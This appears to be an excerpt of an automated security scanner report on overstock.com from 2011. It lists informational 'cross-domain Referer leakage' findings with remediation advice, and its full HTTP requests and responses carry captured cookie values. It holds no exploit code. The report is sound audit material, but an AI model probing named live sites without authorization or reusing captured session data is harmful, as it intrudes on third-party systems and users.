{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 23 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.overstock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?PAGE=STATICPOPUP&STA_ID=755\ HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 404 Not Found
Date: Sat, 12 Feb 2011 16:28:38 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:38 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:38 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 60061


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->
<html>
<head>
<title>Overstock.com: Online Shopping - Be
...[SNIP]...
<meta name="robots" content="noindex,follow">

<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
</script>


<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os_master.legacy.1.2.2.min.css">
<style type="text/css">
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
</script>

<script language="JavaScript" src="http://ak1.ostkcdn.com/js/thirdparty/omtr/mbox.js"></script>
...[SNIP]...
<a alt="Jewelry" href="/Jewelry-Watches/4/store.html?TID=TNT_NR_DEFAULT"><img width="312" height="152" src="http://ak1.ostkcdn.com/img/mxc/2010-tc-jewelry.jpg"></a>
...[SNIP]...
<a href="http://www.overstock.com/Electronics/2/store.html" title="Electronics - Shop Now"><img src="http://ak1.ostkcdn.com/img/mxc/2010-tc-electronics.jpg" alt="Electronics - Shop Now" border="0"></a>
...[SNIP]...
<a href="http://www.overstock.com/sales" title="Sales - Shop Now"><img src="http://ak1.ostkcdn.com/img/mxc/2010-tc-sales.jpg" alt="Sales - Shop Now" border="0"></a>
...[SNIP]...
<div class="socialHolder">
<img src="http://ak1.ostkcdn.com/img/mxc/2009_os_omailFooterLg.gif" alt="Sign Up For Omail">
<div class="clear8">
...[SNIP]...
<a href="http://www.overstock.com/woundedwarriorproject?TID=R:FOOT_MOD_B"><img src="http://ak1.ostkcdn.com/img/mxc/ftr_wnded_warior_051410.gif" alt="Wounded Warrior" border="0"></a>
...[SNIP]...
<a href="http://www.overstock.com/club-o/19492/static.html?TID=R:FOOT_MOD_C"><img src="http://ak1.ostkcdn.com/img/mxc/ftr_club_o_051410.gif" alt="Sign Up for Club O" border="0"></a>
...[SNIP]...
<div class="grid_1" style="height:106px; background:url(http://ak1.ostkcdn.com/img/mxc/2009_os_socialModSmall.gif) no-repeat; text-align:left;">

<a href="http://www.o.biz/?TID=R:FOOT_MOD_E"><img src="http://ak1.ostkcdn.com/img/mxc/ftr_obiz_051410.gif" alt="Buy Wholesale" border="0"></a>
...[SNIP]...
<li id="facebookTab">
<a href="http://www.facebook.com/pages/Overstockcom/8625520535" onClick="window.open('http://www.facebook.com/pages/Overstockcom/8625520535');return false;" title="Find us on Facebook"></a>
...[SNIP]...
<li id="twitterTab">
<a href="http://twitter.com/overstock" onClick="window.open('http://twitter.com/overstock');return false;" title="Follow us on Twitter"></a>
...[SNIP]...
<a href="http://www.overstock.com/mobile-o?TID=R:FOOT_MOD_D"><img src="http://ak1.ostkcdn.com/img/mxc/2010_mobileo-mod-d.gif" alt="iPhone Application - Click Here" border="0"></a>
...[SNIP]...
<a href="javascript:VeriOpen();"><img src="http://ak1.ostkcdn.com/img/mxc/2009_os_verisign.gif" alt="Verisign Secure" border="0"></a>
...[SNIP]...
<!-- SiteCatalyst code version: H.7. Copyright 1997-2006 Omniture, Inc. More info available at http://www.omniture.com -->


<script language="JavaScript" src="http://ak1.ostkcdn.com/js/s_code.js"></script>
...[SNIP]...

5.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html?IID=prod5072802&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:12 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:12 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:12 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:12 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 133008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak2.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="zoomify_div">

<img style="display: block;" onclick="return viewLarger();" id="activeImage" src="http://ak1.ostkcdn.com/images/products/P12932054.jpg" alt="Buffalo Women's Blue Plaid Jacket"


width='250'

border="0"
onLoad="CheckSize(this)"
/>



<div id="adobeIcon">
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak2.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, true)" href="http://ak1.ostkcdn.com/images/products/MLA12932054.jpg" >
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLA12932054.jpg" alt="Buffalo Women's Blue Plaid Jacket" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, true)" href="http://ak2.ostkcdn.com/images/products/MLB12932054.jpg">
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLB12932054.jpg" alt="Buffalo Women's Blue Plaid Jacket">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak2.ostkcdn.com/img/mxc/stars4_5.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com//img/mxc/apo_fpo_logo.gif' border='0' alt="ApoFpo able">
</dl>
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak2.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak2.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak2.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak2.ostkcdn.com/img/mxc/stars4_5.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<div class="OverallR">&nbsp;&nbsp;&nbsp;Rating: <img id="starImage" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif">
<span id="ratingFinal4">
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=12932054;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html?TID=R:A1_1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:31:33 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:31:33 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:33 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:33 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak1.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="zoomify_div">

<img style="display: block;" onclick="return viewLarger();" id="activeImage" src="http://ak1.ostkcdn.com/images/products/P13042090.jpg" alt="Sean John Men's 3-Button Suit"


width='250'

border="0"
onLoad="CheckSize(this)"
/>



<div id="adobeIcon">
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak1.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, true)" href="http://ak1.ostkcdn.com/images/products/MLA13042090.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA13042090.jpg" alt="Sean John Men's 3-Button Suit" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, true)" href="http://ak2.ostkcdn.com/images/products/MLB13042090.jpg">
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLB13042090.jpg" alt="Sean John Men's 3-Button Suit">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak1.ostkcdn.com/img/mxc/stars4_0.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com//img/mxc/apo_fpo_logo.gif' border='0' alt="ApoFpo able">
</dl>
